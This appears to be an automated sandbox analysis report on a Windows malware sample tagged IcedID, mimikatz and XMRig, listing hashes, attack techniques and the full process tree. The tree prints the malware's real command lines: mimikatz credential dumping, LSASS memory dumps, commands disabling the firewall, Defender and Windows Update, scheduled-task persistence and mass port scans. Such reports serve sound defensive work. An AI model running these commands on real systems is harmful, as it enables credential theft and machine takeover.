Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-10-2024 05:40

General

  • Target

    2024-10-17_90990a9426ff8fa6c8e3dec10580620a_hacktools_icedid_mimikatz.exe

  • Size

    9.7MB

  • MD5

    90990a9426ff8fa6c8e3dec10580620a

  • SHA1

    1fa26b4d232950e6de4cbfcc4635fa84d4293349

  • SHA256

    6ff21ad1d03c83fb11e802b7f76296a824f7af4e4370823267e05c7721569397

  • SHA512

    14ef905cc0bf03c6787c82540a4e062f485ee761ae2ffdf2983c450a0c1dd6b66179d06c4d9b808a95c7d82a929089c6bc568536a4ea77d2a07e284428c52858

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (28870) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1736
      • C:\Windows\TEMP\eyuduassi\uuetgf.exe
        "C:\Windows\TEMP\eyuduassi\uuetgf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3548
    • C:\Users\Admin\AppData\Local\Temp\2024-10-17_90990a9426ff8fa6c8e3dec10580620a_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-10-17_90990a9426ff8fa6c8e3dec10580620a_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4212
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4804
        • C:\Windows\seumlgyb\lebulsi.exe
          C:\Windows\seumlgyb\lebulsi.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4844
    • C:\Windows\seumlgyb\lebulsi.exe
      C:\Windows\seumlgyb\lebulsi.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3428
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4352
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2208
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4896
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:1844
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1520
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:808
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1380
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3196
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3560
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:1860
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:640
              • C:\Windows\zthyliniv\eftbbbiir\wpcap.exe
                C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3720
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:224
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3092
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2516
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:212
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3044
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                      PID:3852
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3648
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3456
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2992
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3332
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1392
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2672
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3200
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2456
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3588
                • C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe
                  C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1300
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:4996
                • C:\Windows\zthyliniv\Corporate\vfshost.exe
                  C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4944
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4832
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4080
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "heumqybsu" /ru system /tr "cmd /c C:\Windows\ime\lebulsi.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2716
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1836
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:4748
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /sc minute /mo 1 /tn "lgryeyifg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1756
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                  2⤵
                    PID:3244
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4052
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "anfnabsvu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4376
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1044
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3116
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3040
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4684
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1428
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4772
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:3332
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4980
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:532
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4896
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3908
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4740
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                      PID:1468
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3992
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2296
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4552
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh firewall set opmode mode=disable
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4652
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh Advfirewall set allprofiles state off
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4856
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh Advfirewall set allprofiles state off
                        3⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:1476
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop MpsSvc
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4824
                      • C:\Windows\SysWOW64\net.exe
                        net stop MpsSvc
                        3⤵
                          PID:3064
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                              PID:3456
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop WinDefend
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4392
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1996
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1696
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1072
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3044
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2300
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                            PID:4412
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:2340
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:4404
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4352
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                              PID:4692
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WinDefend start= disabled
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:1228
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config wuauserv start= disabled
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4828
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                3⤵
                                • Launches sc.exe
                                PID:1400
                            • C:\Windows\TEMP\xohudmc.exe
                              C:\Windows\TEMP\xohudmc.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious use of SetWindowsHookEx
                              PID:4964
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 776 C:\Windows\TEMP\zthyliniv\776.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5072
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1020 C:\Windows\TEMP\zthyliniv\1020.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2204
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1736 C:\Windows\TEMP\zthyliniv\1736.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3328
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2440 C:\Windows\TEMP\zthyliniv\2440.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4552
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2576 C:\Windows\TEMP\zthyliniv\2576.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1476
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 2748 C:\Windows\TEMP\zthyliniv\2748.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3852
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3048 C:\Windows\TEMP\zthyliniv\3048.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3648
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3792 C:\Windows\TEMP\zthyliniv\3792.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:828
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3892 C:\Windows\TEMP\zthyliniv\3892.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1840
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3956 C:\Windows\TEMP\zthyliniv\3956.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3980
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4040 C:\Windows\TEMP\zthyliniv\4040.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1300
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1904 C:\Windows\TEMP\zthyliniv\1904.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2276
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4020 C:\Windows\TEMP\zthyliniv\4020.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:380
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 1820 C:\Windows\TEMP\zthyliniv\1820.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4996
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3504 C:\Windows\TEMP\zthyliniv\3504.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4760
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 3224 C:\Windows\TEMP\zthyliniv\3224.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:212
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 960 C:\Windows\TEMP\zthyliniv\960.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:836
                            • C:\Windows\TEMP\zthyliniv\sadefbibf.exe
                              C:\Windows\TEMP\zthyliniv\sadefbibf.exe -accepteula -mp 4884 C:\Windows\TEMP\zthyliniv\4884.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4624
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c C:\Windows\zthyliniv\eftbbbiir\scan.bat
                              2⤵
                                PID:1656
                                • C:\Windows\zthyliniv\eftbbbiir\ysesbhsym.exe
                                  ysesbhsym.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
                                  3⤵
                                  • Executes dropped EXE
                                  • Drops file in Windows directory
                                  PID:2224
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                2⤵
                                  PID:2760
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5220
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5268
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5528
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5384
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5416
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    3⤵
                                      PID:5540
                                • C:\Windows\SysWOW64\cusoqc.exe
                                  C:\Windows\SysWOW64\cusoqc.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2592
                                • C:\Windows\system32\cmd.EXE
                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                                  1⤵
                                    PID:1428
                                    • C:\Windows\ime\lebulsi.exe
                                      C:\Windows\ime\lebulsi.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5048
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                    1⤵
                                      PID:2176
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:4172
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\eyuduassi\uuetgf.exe /p everyone:F
                                          2⤵
                                            PID:1760
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                          1⤵
                                            PID:2252
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:3460
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\seumlgyb\lebulsi.exe /p everyone:F
                                                2⤵
                                                  PID:4588
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lebulsi.exe
                                                1⤵
                                                  PID:800
                                                  • C:\Windows\ime\lebulsi.exe
